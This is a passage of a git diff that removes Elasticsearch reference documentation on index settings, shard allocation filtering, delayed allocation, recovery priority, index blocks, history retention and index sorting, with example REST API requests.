{ess-icon}:: -The number of primary shards that an index should have. Defaults to `1`. This setting can only be set at index creation time. It cannot be changed on a closed index. -+ -NOTE: The number of shards are limited to `1024` per index. This limitation is a safety limit to prevent accidental creation of indices that can destabilize a cluster due to resource allocation. The limit can be modified by specifying `export ES_JAVA_OPTS="-Des.index.max_number_of_shards=128"` system property on every node that is part of the cluster. - -// end::index-number-of-shards-tag[] - -[[index-number-of-routing-shards]] -`index.number_of_routing_shards`:: -+ -==== -Number of routing shards used to <> an index. - -For example, a 5 shard index with `number_of_routing_shards` set to `30` (`5 x -2 x 3`) could be split by a factor of `2` or `3`. In other words, it could be -split as follows: - -* `5` -> `10` -> `30` (split by 2, then by 3) -* `5` -> `15` -> `30` (split by 3, then by 2) -* `5` -> `30` (split by 6) - -This setting's default value depends on the number of primary shards in the -index. The default is designed to allow you to split by factors of 2 up -to a maximum of 1024 shards. -==== - -`index.shard.check_on_startup`:: - -Whether or not shards should be checked for corruption before opening. When -corruption is detected, it will prevent the shard from being opened. -Accepts: -`false`::: (default) Don't check for corruption when opening a shard. -`checksum`::: Check for physical corruption. -`true`::: Check for both physical and logical corruption. This is much more -expensive in terms of CPU and memory usage. -+ -WARNING: Expert only. Checking shards may take a lot of time on large -indices. - -[[index-codec]] `index.codec`:: - - The +default+ value compresses stored data with LZ4 - compression, but this can be set to +best_compression+ - which uses {wikipedia}/DEFLATE[DEFLATE] for a higher - compression ratio, at the expense of slower stored fields performance. - If you are updating the compression type, the new one will be applied - after segments are merged. Segment merging can be forced using - <>. - -[[routing-partition-size]] `index.routing_partition_size`:: - - The number of shards a custom <> value can go to. - Defaults to 1 and can only be set at index creation time. This value must be less - than the `index.number_of_shards` unless the `index.number_of_shards` value is also 1. - See <> for more details about how this setting is used. - -[[ccr-index-soft-deletes]] -// tag::ccr-index-soft-deletes-tag[] -`index.soft_deletes.enabled`:: -deprecated:[7.6.0, Creating indices with soft-deletes disabled is deprecated and will be removed in future Elasticsearch versions.] -Indicates whether soft deletes are enabled on the index. Soft deletes can only -be configured at index creation and only on indices created on or after -{es} 6.5.0. Defaults to `true`. -// end::ccr-index-soft-deletes-tag[] - -[[ccr-index-soft-deletes-retention-period]] -//tag::ccr-index-soft-deletes-retention-tag[] -`index.soft_deletes.retention_lease.period`:: -The maximum period to retain a shard history retention lease before it is -considered expired. Shard history retention leases ensure that soft deletes are -retained during merges on the Lucene index. If a soft delete is merged away -before it can be replicated to a follower the following process will fail due -to incomplete history on the leader. Defaults to `12h`. -//end::ccr-index-soft-deletes-retention-tag[] - -[[load-fixed-bitset-filters-eagerly]] `index.load_fixed_bitset_filters_eagerly`:: - - Indicates whether <> are pre-loaded for - nested queries. Possible values are `true` (default) and `false`. - -[[index-hidden]] `index.hidden`:: - - Indicates whether the index should be hidden by default. Hidden indices are not - returned by default when using a wildcard expression. This behavior is controlled - per request through the use of the `expand_wildcards` parameter. Possible values are - `true` and `false` (default). - -[discrete] -[[dynamic-index-settings]] -=== Dynamic index settings - -Below is a list of all _dynamic_ index settings that are not associated with any -specific index module: - -[[dynamic-index-number-of-replicas]] -`index.number_of_replicas`:: - - The number of replicas each primary shard has. Defaults to 1. - -`index.auto_expand_replicas`:: - - Auto-expand the number of replicas based on the number of data nodes in the cluster. - Set to a dash delimited lower and upper bound (e.g. `0-5`) or use `all` - for the upper bound (e.g. `0-all`). Defaults to `false` (i.e. disabled). - Note that the auto-expanded number of replicas only takes - <> rules into account, but ignores - any other allocation rules such as <> - and <>, and this can lead to the - cluster health becoming `YELLOW` if the applicable rules prevent all the replicas - from being allocated. - -`index.search.idle.after`:: - How long a shard can not receive a search or get request until it's considered - search idle. (default is `30s`) - -[[index-refresh-interval-setting]] -`index.refresh_interval`:: - - How often to perform a refresh operation, which makes recent changes to the - index visible to search. Defaults to `1s`. Can be set to `-1` to disable - refresh. If this setting is not explicitly set, shards that haven't seen - search traffic for at least `index.search.idle.after` seconds will not receive - background refreshes until they receive a search request. Searches that hit an - idle shard where a refresh is pending will wait for the next background - refresh (within `1s`). This behavior aims to automatically optimize bulk - indexing in the default case when no searches are performed. In order to opt - out of this behavior an explicit value of `1s` should set as the refresh - interval. - -[[index-max-result-window]] -`index.max_result_window`:: - - The maximum value of `from + size` for searches to this index. Defaults to - `10000`. Search requests take heap memory and time proportional to - `from + size` and this limits that memory. See - <> or <> for a more efficient alternative - to raising this. - -`index.max_inner_result_window`:: - - The maximum value of `from + size` for inner hits definition and top hits aggregations to this index. Defaults to - `100`. Inner hits and top hits aggregation take heap memory and time proportional to `from + size` and this limits that memory. - -`index.max_rescore_window`:: - - The maximum value of `window_size` for `rescore` requests in searches of this index. - Defaults to `index.max_result_window` which defaults to `10000`. Search - requests take heap memory and time proportional to - `max(window_size, from + size)` and this limits that memory. - -`index.max_docvalue_fields_search`:: - - The maximum number of `docvalue_fields` that are allowed in a query. - Defaults to `100`. Doc-value fields are costly since they might incur - a per-field per-document seek. - -`index.max_script_fields`:: - - The maximum number of `script_fields` that are allowed in a query. - Defaults to `32`. - -[[index-max-ngram-diff]] -`index.max_ngram_diff`:: - - The maximum allowed difference between min_gram and max_gram for NGramTokenizer and NGramTokenFilter. - Defaults to `1`. - -[[index-max-shingle-diff]] -`index.max_shingle_diff`:: - - The maximum allowed difference between max_shingle_size and min_shingle_size - for the <>. Defaults to - `3`. - -`index.max_refresh_listeners`:: - - Maximum number of refresh listeners available on each shard of the index. - These listeners are used to implement <>. - - `index.analyze.max_token_count`:: - - The maximum number of tokens that can be produced using _analyze API. - Defaults to `10000`. - - `index.highlight.max_analyzed_offset`:: - - The maximum number of characters that will be analyzed for a highlight request. - This setting is only applicable when highlighting is requested on a text that was indexed without offsets or term vectors. - Defaults to `1000000`. - -[[index-max-terms-count]] - `index.max_terms_count`:: - - The maximum number of terms that can be used in Terms Query. - Defaults to `65536`. - -[[index-max-regex-length]] - `index.max_regex_length`:: - - The maximum length of regex that can be used in Regexp Query. - Defaults to `1000`. - - `index.routing.allocation.enable`:: - - Controls shard allocation for this index. It can be set to: - * `all` (default) - Allows shard allocation for all shards. - * `primaries` - Allows shard allocation only for primary shards. - * `new_primaries` - Allows shard allocation only for newly-created primary shards. - * `none` - No shard allocation is allowed. - - `index.routing.rebalance.enable`:: - - Enables shard rebalancing for this index. It can be set to: - * `all` (default) - Allows shard rebalancing for all shards. - * `primaries` - Allows shard rebalancing only for primary shards. - * `replicas` - Allows shard rebalancing only for replica shards. - * `none` - No shard rebalancing is allowed. - - `index.gc_deletes`:: - - The length of time that a <> remains available for <>. - Defaults to `60s`. - - `index.default_pipeline`:: - - The default <> pipeline for this index. Index requests will fail - if the default pipeline is set and the pipeline does not exist. The default may be - overridden using the `pipeline` parameter. The special pipeline name `_none` indicates - no ingest pipeline should be run. - - `index.final_pipeline`:: - The final <> pipeline for this index. Index requests - will fail if the final pipeline is set and the pipeline does not exist. - The final pipeline always runs after the request pipeline (if specified) and - the default pipeline (if it exists). The special pipeline name `_none` - indicates no ingest pipeline will run. - -[discrete] -=== Settings in other index modules - -Other index settings are available in index modules: - -<>:: - - Settings to define analyzers, tokenizers, token filters and character - filters. - -<>:: - - Control over where, when, and how shards are allocated to nodes. - -<>:: - - Enable or disable dynamic mapping for an index. - -<>:: - - Control over how shards are merged by the background merge process. - -<>:: - - Configure custom similarity settings to customize how search results are - scored. - -<>:: - - Control over how slow queries and fetch requests are logged. - -<>:: - - Configure the type of filesystem used to access shard data. - -<>:: - - Control over the transaction log and background flush operations. - -<>:: - - Control over the retention of a history of operations in the index. - -<>:: - - Configure indexing back pressure limits. - -[discrete] -[[x-pack-index-settings]] -=== [xpack]#{xpack} index settings# - -<>:: - - Specify the lifecycle policy and rollover alias for an index. --- - -include::index-modules/analysis.asciidoc[] - -include::index-modules/allocation.asciidoc[] - -include::index-modules/blocks.asciidoc[] - -include::index-modules/mapper.asciidoc[] - -include::index-modules/merge.asciidoc[] - -include::index-modules/similarity.asciidoc[] - -include::index-modules/slowlog.asciidoc[] - -include::index-modules/store.asciidoc[] - -include::index-modules/translog.asciidoc[] - -include::index-modules/history-retention.asciidoc[] - -include::index-modules/index-sorting.asciidoc[] - -include::index-modules/indexing-pressure.asciidoc[] diff --git a/docs/reference/index-modules/allocation.asciidoc b/docs/reference/index-modules/allocation.asciidoc deleted file mode 100644 index 709f66b7f35..00000000000 --- a/docs/reference/index-modules/allocation.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -[[index-modules-allocation]] -== Index Shard Allocation - -This module provides per-index settings to control the allocation of shards to -nodes: - -* <>: Controlling which shards are allocated to which nodes. -* <>: Delaying allocation of unassigned shards caused by a node leaving. -* <>: A hard limit on the number of shards from the same index per node. -* <>: Controls the allocation of indices to <>. - -include::allocation/filtering.asciidoc[] - -include::allocation/delayed.asciidoc[] - -include::allocation/prioritization.asciidoc[] - -include::allocation/total_shards.asciidoc[] - -include::allocation/data_tier_allocation.asciidoc[] diff --git a/docs/reference/index-modules/allocation/data_tier_allocation.asciidoc b/docs/reference/index-modules/allocation/data_tier_allocation.asciidoc deleted file mode 100644 index ea5aa3c5678..00000000000 --- a/docs/reference/index-modules/allocation/data_tier_allocation.asciidoc +++ /dev/null @@ -1,50 +0,0 @@ -[role="xpack"] -[[data-tier-shard-filtering]] -=== Index-level data tier allocation filtering - -You can use index-level allocation settings to control which <> -the index is allocated to. The data tier allocator is a -<> that uses two built-in -node attributes: `_tier` and `_tier_preference`. - -These tier attributes are set using the data node roles: - -* <> -* <> -* <> -* <> - -NOTE: The <> role is not a valid data tier and cannot be used -for data tier filtering. - -[discrete] -[[data-tier-allocation-filters]] -==== Data tier allocation settings - - -`index.routing.allocation.include._tier`:: - - Assign the index to a node whose `node.roles` configuration has at - least one of to the comma-separated values. - -`index.routing.allocation.require._tier`:: - - Assign the index to a node whose `node.roles` configuration has _all_ - of the comma-separated values. - -`index.routing.allocation.exclude._tier`:: - - Assign the index to a node whose `node.roles` configuration has _none_ of the - comma-separated values. - -[[tier-preference-allocation-filter]] -`index.routing.allocation.include._tier_preference`:: - - Assign the index to the first tier in the list that has an available node. - This prevents indices from remaining unallocated if no nodes are available - in the preferred tier. - For example, if you set `index.routing.allocation.include._tier_preference` - to `data_warm,data_hot`, the index is allocated to the warm tier if there - are nodes with the `data_warm` role. If there are no nodes in the warm tier, - but there are nodes with the `data_hot` role, the index is allocated to - the hot tier. diff --git a/docs/reference/index-modules/allocation/delayed.asciidoc b/docs/reference/index-modules/allocation/delayed.asciidoc deleted file mode 100644 index f49ed7e05db..00000000000 --- a/docs/reference/index-modules/allocation/delayed.asciidoc +++ /dev/null @@ -1,105 +0,0 @@ -[[delayed-allocation]] -=== Delaying allocation when a node leaves - -When a node leaves the cluster for whatever reason, intentional or otherwise, -the master reacts by: - -* Promoting a replica shard to primary to replace any primaries that were on the node. -* Allocating replica shards to replace the missing replicas (assuming there are enough nodes). -* Rebalancing shards evenly across the remaining nodes. - -These actions are intended to protect the cluster against data loss by -ensuring that every shard is fully replicated as soon as possible. - -Even though we throttle concurrent recoveries both at the -<> and at the <>, this -``shard-shuffle'' can still put a lot of extra load on the cluster which -may not be necessary if the missing node is likely to return soon. Imagine -this scenario: - -* Node 5 loses network connectivity. -* The master promotes a replica shard to primary for each primary that was on Node 5. -* The master allocates new replicas to other nodes in the cluster. -* Each new replica makes an entire copy of the primary shard across the network. -* More shards are moved to different nodes to rebalance the cluster. -* Node 5 returns after a few minutes. -* The master rebalances the cluster by allocating shards to Node 5. - -If the master had just waited for a few minutes, then the missing shards could -have been re-allocated to Node 5 with the minimum of network traffic. This -process would be even quicker for idle shards (shards not receiving indexing -requests) which have been automatically <>. - -The allocation of replica shards which become unassigned because a node has -left can be delayed with the `index.unassigned.node_left.delayed_timeout` -dynamic setting, which defaults to `1m`. - -This setting can be updated on a live index (or on all indices): - -[source,console] ------------------------------- -PUT _all/_settings -{ - "settings": { - "index.unassigned.node_left.delayed_timeout": "5m" - } -} ------------------------------- -// TEST[s/^/PUT test\n/] - -With delayed allocation enabled, the above scenario changes to look like this: - -* Node 5 loses network connectivity. -* The master promotes a replica shard to primary for each primary that was on Node 5. -* The master logs a message that allocation of unassigned shards has been delayed, and for how long. -* The cluster remains yellow because there are unassigned replica shards. -* Node 5 returns after a few minutes, before the `timeout` expires. -* The missing replicas are re-allocated to Node 5 (and sync-flushed shards recover almost immediately). - -NOTE: This setting will not affect the promotion of replicas to primaries, nor -will it affect the assignment of replicas that have not been assigned -previously. In particular, delayed allocation does not come into effect after a full cluster restart. -Also, in case of a master failover situation, elapsed delay time is forgotten -(i.e. reset to the full initial delay). - -==== Cancellation of shard relocation - -If delayed allocation times out, the master assigns the missing shards to -another node which will start recovery. If the missing node rejoins the -cluster, and its shards still have the same sync-id as the primary, shard -relocation will be cancelled and the synced shard will be used for recovery -instead. - -For this reason, the default `timeout` is set to just one minute: even if shard -relocation begins, cancelling recovery in favour of the synced shard is cheap. - -==== Monitoring delayed unassigned shards - -The number of shards whose allocation has been delayed by this timeout setting -can be viewed with the <>: - -[source,console] ------------------------------- -GET _cluster/health <1> ------------------------------- - -<1> This request will return a `delayed_unassigned_shards` value. - -==== Removing a node permanently - -If a node is not going to return and you would like Elasticsearch to allocate -the missing shards immediately, just update the timeout to zero: - - -[source,console] ------------------------------- -PUT _all/_settings -{ - "settings": { - "index.unassigned.node_left.delayed_timeout": "0" - } -} ------------------------------- -// TEST[s/^/PUT test\n/] - -You can reset the timeout as soon as the missing shards have started to recover. diff --git a/docs/reference/index-modules/allocation/filtering.asciidoc b/docs/reference/index-modules/allocation/filtering.asciidoc deleted file mode 100644 index 6b481fb9a51..00000000000 --- a/docs/reference/index-modules/allocation/filtering.asciidoc +++ /dev/null @@ -1,128 +0,0 @@ -[[shard-allocation-filtering]] -=== Index-level shard allocation filtering - -You can use shard allocation filters to control where {es} allocates shards of -a particular index. These per-index filters are applied in conjunction with -<> and -<>. - -Shard allocation filters can be based on custom node attributes or the built-in -`_name`, `_host_ip`, `_publish_ip`, `_ip`, `_host`, `_id`, `_tier` and `_tier_preference` -attributes. <> uses filters based -on custom node attributes to determine how to reallocate shards when moving -between phases. - -The `cluster.routing.allocation` settings are dynamic, enabling live indices to -be moved from one set of nodes to another. Shards are only relocated if it is -possible to do so without breaking another routing constraint, such as never -allocating a primary and replica shard on the same node. - -For example, you could use a custom node attribute to indicate a node's -performance characteristics and use shard allocation filtering to route shards -for a particular index to the most appropriate class of hardware. - -[discrete] -[[index-allocation-filters]] -==== Enabling index-level shard allocation filtering - -To filter based on a custom node attribute: - -. Specify the filter characteristics with a custom node attribute in each -node's `elasticsearch.yml` configuration file. For example, if you have `small`, -`medium`, and `big` nodes, you could add a `size` attribute to filter based -on node size. -+ -[source,yaml] --------------------------------------------------------- -node.attr.size: medium --------------------------------------------------------- -+ -You can also set custom attributes when you start a node: -+ -[source,sh] --------------------------------------------------------- -`./bin/elasticsearch -Enode.attr.size=medium --------------------------------------------------------- - -. Add a routing allocation filter to the index. The `index.routing.allocation` -settings support three types of filters: `include`, `exclude`, and `require`. -For example, to tell {es} to allocate shards from the `test` index to either -`big` or `medium` nodes, use `index.routing.allocation.include`: -+ --- -[source,console] ------------------------- -PUT test/_settings -{ - "index.routing.allocation.include.size": "big,medium" -} ------------------------- -// TEST[s/^/PUT test\n/] - -If you specify multiple filters the following conditions must be satisfied -simultaneously by a node in order for shards to be relocated to it: - -* If any `require` type conditions are specified, all of them must be satisfied -* If any `exclude` type conditions are specified, none of them may be satisfied -* If any `include` type conditions are specified, at least one of them must be -satisfied - -For example, to move the `test` index to `big` nodes in `rack1`, you could -specify: - -[source,console] ------------------------- -PUT test/_settings -{ - "index.routing.allocation.require.size": "big", - "index.routing.allocation.require.rack": "rack1" -} ------------------------- -// TEST[s/^/PUT test\n/] --- - -[discrete] -[[index-allocation-settings]] -==== Index allocation filter settings - -`index.routing.allocation.include.{attribute}`:: - - Assign the index to a node whose `{attribute}` has at least one of the - comma-separated values. - -`index.routing.allocation.require.{attribute}`:: - - Assign the index to a node whose `{attribute}` has _all_ of the - comma-separated values. - -`index.routing.allocation.exclude.{attribute}`:: - - Assign the index to a node whose `{attribute}` has _none_ of the - comma-separated values. - -The index allocation settings support the following built-in attributes: - -[horizontal] -`_name`:: Match nodes by node name -`_host_ip`:: Match nodes by host IP address (IP associated with hostname) -`_publish_ip`:: Match nodes by publish IP address -`_ip`:: Match either `_host_ip` or `_publish_ip` -`_host`:: Match nodes by hostname -`_id`:: Match nodes by node id -`_tier`:: Match nodes by the node's <> role. - For more details see <> - -NOTE: `_tier` filtering is based on <> roles. Only -a subset of roles are <> roles, and the generic -<> will match any tier filtering. - -You can use wildcards when specifying attribute values, for example: - -[source,console] ------------------------- -PUT test/_settings -{ - "index.routing.allocation.include._ip": "192.168.2.*" -} ------------------------- -// TEST[skip:indexes don't assign] diff --git a/docs/reference/index-modules/allocation/prioritization.asciidoc b/docs/reference/index-modules/allocation/prioritization.asciidoc deleted file mode 100644 index 5a864b657ba..00000000000 --- a/docs/reference/index-modules/allocation/prioritization.asciidoc +++ /dev/null @@ -1,54 +0,0 @@ -[[recovery-prioritization]] -=== Index recovery prioritization - -Unallocated shards are recovered in order of priority, whenever possible. -Indices are sorted into priority order as follows: - -* the optional `index.priority` setting (higher before lower) -* the index creation date (higher before lower) -* the index name (higher before lower) - -This means that, by default, newer indices will be recovered before older indices. - -Use the per-index dynamically updatable `index.priority` setting to customise -the index prioritization order. For instance: - -[source,console] ------------------------------- -PUT index_1 - -PUT index_2 - -PUT index_3 -{ - "settings": { - "index.priority": 10 - } -} - -PUT index_4 -{ - "settings": { - "index.priority": 5 - } -} ------------------------------- - -In the above example: - -* `index_3` will be recovered first because it has the highest `index.priority`. -* `index_4` will be recovered next because it has the next highest priority. -* `index_2` will be recovered next because it was created more recently. -* `index_1` will be recovered last. - -This setting accepts an integer, and can be updated on a live index with the -<>: - -[source,console] ------------------------------- -PUT index_4/_settings -{ - "index.priority": 1 -} ------------------------------- -// TEST[continued] diff --git a/docs/reference/index-modules/allocation/total_shards.asciidoc b/docs/reference/index-modules/allocation/total_shards.asciidoc deleted file mode 100644 index 265ef79564d..00000000000 --- a/docs/reference/index-modules/allocation/total_shards.asciidoc +++ /dev/null @@ -1,46 +0,0 @@ -[[allocation-total-shards]] -=== Total shards per node - -The cluster-level shard allocator tries to spread the shards of a single index -across as many nodes as possible. However, depending on how many shards and -indices you have, and how big they are, it may not always be possible to spread -shards evenly. - -The following _dynamic_ setting allows you to specify a hard limit on the total -number of shards from a single index allowed per node: - -[[total-shards-per-node]] -`index.routing.allocation.total_shards_per_node`:: - - The maximum number of shards (replicas and primaries) that will be - allocated to a single node. Defaults to unbounded. - -You can also limit the amount of shards a node can have regardless of the index: - -[[cluster-total-shards-per-node]] -`cluster.routing.allocation.total_shards_per_node`:: -+ --- -(<>) -Maximum number of primary and replica shards allocated to each node. Defaults to -`-1` (unlimited). - -{es} checks this setting during shard allocation. For example, a cluster has a -`cluster.routing.allocation.total_shards_per_node` setting of `100` and three -nodes with the following shard allocations: - -- Node A: 100 shards -- Node B: 98 shards -- Node C: 1 shard - -If node C fails, {es} reallocates its shard to node B. Reallocating the shard to -node A would exceed node A's shard limit. --- - -[WARNING] -======================================= -These settings impose a hard limit which can result in some shards not being -allocated. - -Use with caution. -======================================= diff --git a/docs/reference/index-modules/analysis.asciidoc b/docs/reference/index-modules/analysis.asciidoc deleted file mode 100644 index 709e5be5706..00000000000 --- a/docs/reference/index-modules/analysis.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[index-modules-analysis]] -== Analysis - -The index analysis module acts as a configurable registry of _analyzers_ -that can be used in order to convert a string field into individual terms -which are: - -* added to the inverted index in order to make the document searchable -* used by high level queries such as the <> - to generate search terms. - -See <> for configuration details. diff --git a/docs/reference/index-modules/blocks.asciidoc b/docs/reference/index-modules/blocks.asciidoc deleted file mode 100644 index 8431dc80492..00000000000 --- a/docs/reference/index-modules/blocks.asciidoc +++ /dev/null @@ -1,141 +0,0 @@ -[[index-modules-blocks]] -== Index blocks - -Index blocks limit the kind of operations that are available on a certain -index. The blocks come in different flavours, allowing to block write, -read, or metadata operations. The blocks can be set / removed using dynamic -index settings, or can be added using a dedicated API, which also ensures -for write blocks that, once successfully returning to the user, all shards -of the index are properly accounting for the block, for example that all -in-flight writes to an index have been completed after adding the write -block. - -[discrete] -[[index-block-settings]] -=== Index block settings - -The following _dynamic_ index settings determine the blocks present on an -index: - -[[index-blocks-read-only]] -`index.blocks.read_only`:: - - Set to `true` to make the index and index metadata read only, `false` to - allow writes and metadata changes. - -`index.blocks.read_only_allow_delete`:: - - Similar to `index.blocks.read_only`, but also allows deleting the index to - make more resources available. The <> may add and remove this block automatically. -+ -Deleting documents from an index to release resources - rather than deleting the index itself - can increase the index size over time. When `index.blocks.read_only_allow_delete` is set to `true`, deleting documents is not permitted. However, deleting the index itself releases the read-only index block and makes resources available almost immediately. -+ -IMPORTANT: {es} adds and removes the read-only index block automatically when the disk utilization falls below the high watermark, controlled by <>. - -`index.blocks.read`:: - - Set to `true` to disable read operations against the index. - -`index.blocks.write`:: - - Set to `true` to disable data write operations against the index. Unlike `read_only`, - this setting does not affect metadata. For instance, you can close an index with a `write` - block, but you cannot close an index with a `read_only` block. - -`index.blocks.metadata`:: - - Set to `true` to disable index metadata reads and writes. - -[discrete] -[[add-index-block]] -=== Add index block API - -Adds an index block to an index. - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_block/write --------------------------------------------------- -// TEST[setup:my_index] - - -[discrete] -[[add-index-block-api-request]] -==== {api-request-title} - -`PUT //_block/` - - -[discrete] -[role="child_attributes"] -[[add-index-block-api-path-params]] -==== {api-path-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index] -+ -To add blocks to all indices, use `_all` or `*`. To disallow the adding -of blocks to indices with `_all` or wildcard expressions, -change the `action.destructive_requires_name` cluster setting to `true`. -You can update this setting in the `elasticsearch.yml` file -or using the <> API. -``:: -(Required, string) -Block type to add to the index. -+ -.Valid values for `` -[%collapsible%open] -==== -`metadata`:: -Disable metadata changes, such as closing the index. - -`read`:: -Disable read operations. - -`read_only`:: -Disable write operations and metadata changes. - -`write`:: -Disable write operations. However, metadata changes are still allowed. -==== -[discrete] -[[add-index-block-api-query-params]] -==== {api-query-parms-title} - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=allow-no-indices] -+ -Defaults to `true`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=expand-wildcards] -+ -Defaults to `open`. - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=index-ignore-unavailable] - -include::{es-repo-dir}/rest-api/common-parms.asciidoc[tag=timeoutparms] - -[discrete] -[[add-index-block-api-example]] -==== {api-examples-title} - -The following example shows how to add an index block: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_block/write --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\n/] - -The API returns following response: - -[source,console-result] --------------------------------------------------- -{ - "acknowledged" : true, - "shards_acknowledged" : true, - "indices" : [ { - "name" : "my-index-000001", - "blocked" : true - } ] -} --------------------------------------------------- diff --git a/docs/reference/index-modules/history-retention.asciidoc b/docs/reference/index-modules/history-retention.asciidoc deleted file mode 100644 index eac0abb5a0f..00000000000 --- a/docs/reference/index-modules/history-retention.asciidoc +++ /dev/null @@ -1,64 +0,0 @@ -[[index-modules-history-retention]] -== History retention - -{es} sometimes needs to replay some of the operations that were performed on a -shard. For instance, if a replica is briefly offline then it may be much more -efficient to replay the few operations it missed while it was offline than to -rebuild it from scratch. Similarly, {ccr} works by performing operations on the -leader cluster and then replaying those operations on the follower cluster. - -At the Lucene level there are really only two write operations that {es} -performs on an index: a new document may be indexed, or an existing document may -be deleted. Updates are implemented by atomically deleting the old document and -then indexing the new document. A document indexed into Lucene already contains -all the information needed to replay that indexing operation, but this is not -true of document deletions. To solve this, {es} uses a feature called _soft -deletes_ to preserve recent deletions in the Lucene index so that they can be -replayed. - -{es} only preserves certain recently-deleted documents in the index because a -soft-deleted document still takes up some space. Eventually {es} will fully -discard these soft-deleted documents to free up that space so that the index -does not grow larger and larger over time. Fortunately {es} does not need to be -able to replay every operation that has ever been performed on a shard, because -it is always possible to make a full copy of a shard on a remote node. However, -copying the whole shard may take much longer than replaying a few missing -operations, so {es} tries to retain all of the operations it expects to need to -replay in future. - -{es} keeps track of the operations it expects to need to replay in future using -a mechanism called _shard history retention leases_. Each shard copy that might -need operations to be replayed must first create a shard history retention lease -for itself. For example, this shard copy might be a replica of a shard or it -might be a shard of a follower index when using {ccr}. Each retention lease -keeps track of the sequence number of the first operation that the corresponding -shard copy has not received. As the shard copy receives new operations, it -increases the sequence number contained in its retention lease to indicate that -it will not need to replay those operations in future. {es} discards -soft-deleted operations once they are not being held by any retention lease. - -If a shard copy fails then it stops updating its shard history retention lease, -which means that {es} will preserve all new operations so they can be replayed -when the failed shard copy recovers. However, retention leases only last for a -limited amount of time. If the shard copy does not recover quickly enough then -its retention lease may expire. This protects {es} from retaining history -forever if a shard copy fails permanently, because once a retention lease has -expired {es} can start to discard history again. If a shard copy recovers after -its retention lease has expired then {es} will fall back to copying the whole -index since it can no longer simply replay the missing history. The expiry time -of a retention lease defaults to `12h` which should be long enough for most -reasonable recovery scenarios. - -Soft deletes are enabled by default on indices created in recent versions, but -they can be explicitly enabled or disabled at index creation time. If soft -deletes are disabled then peer recoveries can still sometimes take place by -copying just the missing operations from the translog -<>. {ccr-cap} will not function if soft deletes are disabled. - -[discrete] -=== History retention settings - -include::{es-ref-dir}/index-modules.asciidoc[tag=ccr-index-soft-deletes-tag] - -include::{es-ref-dir}/index-modules.asciidoc[tag=ccr-index-soft-deletes-retention-tag] diff --git a/docs/reference/index-modules/index-sorting.asciidoc b/docs/reference/index-modules/index-sorting.asciidoc deleted file mode 100644 index e32684c8264..00000000000 --- a/docs/reference/index-modules/index-sorting.asciidoc +++ /dev/null @@ -1,214 +0,0 @@ -[[index-modules-index-sorting]] -== Index Sorting - -When creating a new index in Elasticsearch it is possible to configure how the Segments -inside each Shard will be sorted. By default Lucene does not apply any sort. -The `index.sort.*` settings define which fields should be used to sort the documents inside each Segment. - -[WARNING] -nested fields are not compatible with index sorting because they rely on the assumption -that nested documents are stored in contiguous doc ids, which can be broken by index sorting. -An error will be thrown if index sorting is activated on an index that contains nested fields. - -For instance the following example shows how to define a sort on a single field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "index": { - "sort.field": "date", <1> - "sort.order": "desc" <2> - } - }, - "mappings": { - "properties": { - "date": { - "type": "date" - } - } - } -} --------------------------------------------------- - -<1> This index is sorted by the `date` field -<2> ... in descending order. - -It is also possible to sort the index by more than one field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "index": { - "sort.field": [ "username", "date" ], <1> - "sort.order": [ "asc", "desc" ] <2> - } - }, - "mappings": { - "properties": { - "username": { - "type": "keyword", - "doc_values": true - }, - "date": { - "type": "date" - } - } - } -} --------------------------------------------------- - -<1> This index is sorted by `username` first then by `date` -<2> ... in ascending order for the `username` field and in descending order for the `date` field. - - -Index sorting supports the following settings: - -`index.sort.field`:: - - The list of fields used to sort the index. - Only `boolean`, `numeric`, `date` and `keyword` fields with `doc_values` are allowed here. - -`index.sort.order`:: - - The sort order to use for each field. - The order option can have the following values: - * `asc`: For ascending order - * `desc`: For descending order. - -`index.sort.mode`:: - - Elasticsearch supports sorting by multi-valued fields. - The mode option controls what value is picked to sort the document. - The mode option can have the following values: - * `min`: Pick the lowest value. - * `max`: Pick the highest value. - -`index.sort.missing`:: - - The missing parameter specifies how docs which are missing the field should be treated. - The missing value can have the following values: - * `_last`: Documents without value for the field are sorted last. - * `_first`: Documents without value for the field are sorted first. - -[WARNING] -Index sorting can be defined only once at index creation. It is not allowed to add or update -a sort on an existing index. Index sorting also has a cost in terms of indexing throughput since -documents must be sorted at flush and merge time. You should test the impact on your application -before activating this feature. - -[discrete] -[[early-terminate]] -=== Early termination of search request - -By default in Elasticsearch a search request must visit every document that match a query to -retrieve the top documents sorted by a specified sort. -Though when the index sort and the search sort are the same it is possible to limit -the number of documents that should be visited per segment to retrieve the N top ranked documents globally. -For example, let's say we have an index that contains events sorted by a timestamp field: - -[source,console] --------------------------------------------------- -PUT events -{ - "settings": { - "index": { - "sort.field": "timestamp", - "sort.order": "desc" <1> - } - }, - "mappings": { - "properties": { - "timestamp": { - "type": "date" - } - } - } -} --------------------------------------------------- - -<1> This index is sorted by timestamp in descending order (most recent first) - -You can search for the last 10 events with: - -[source,console] --------------------------------------------------- -GET /events/_search -{ - "size": 10, - "sort": [ - { "timestamp": "desc" } - ] -} --------------------------------------------------- -// TEST[continued] - -Elasticsearch will detect that the top docs of each segment are already sorted in the index -and will only compare the first N documents per segment. -The rest of the documents matching the query are collected to count the total number of results -and to build aggregations. - -If you're only looking for the last 10 events and have no interest in -the total number of documents that match the query you can set `track_total_hits` -to false: - -[source,console] --------------------------------------------------- -GET /events/_search -{ - "size": 10, - "sort": [ <1> - { "timestamp": "desc" } - ], - "track_total_hits": false -} --------------------------------------------------- -// TEST[continued] - -<1> The index sort will be used to rank the top documents and each segment will early terminate the collection after the first 10 matches. - -This time, Elasticsearch will not try to count the number of documents and will be able to terminate the query -as soon as N documents have been collected per segment. - -[source,console-result] --------------------------------------------------- -{ - "_shards": ... - "hits" : { <1> - "max_score" : null, - "hits" : [] - }, - "took": 20, - "timed_out": false -} --------------------------------------------------- -// TESTRESPONSE[s/"_shards": \.\.\./"_shards": "$body._shards",/] -// TESTRESPONSE[s/"took": 20,/"took": "$body.took",/] - -<1> The total number of hits matching the query is unknown because of early 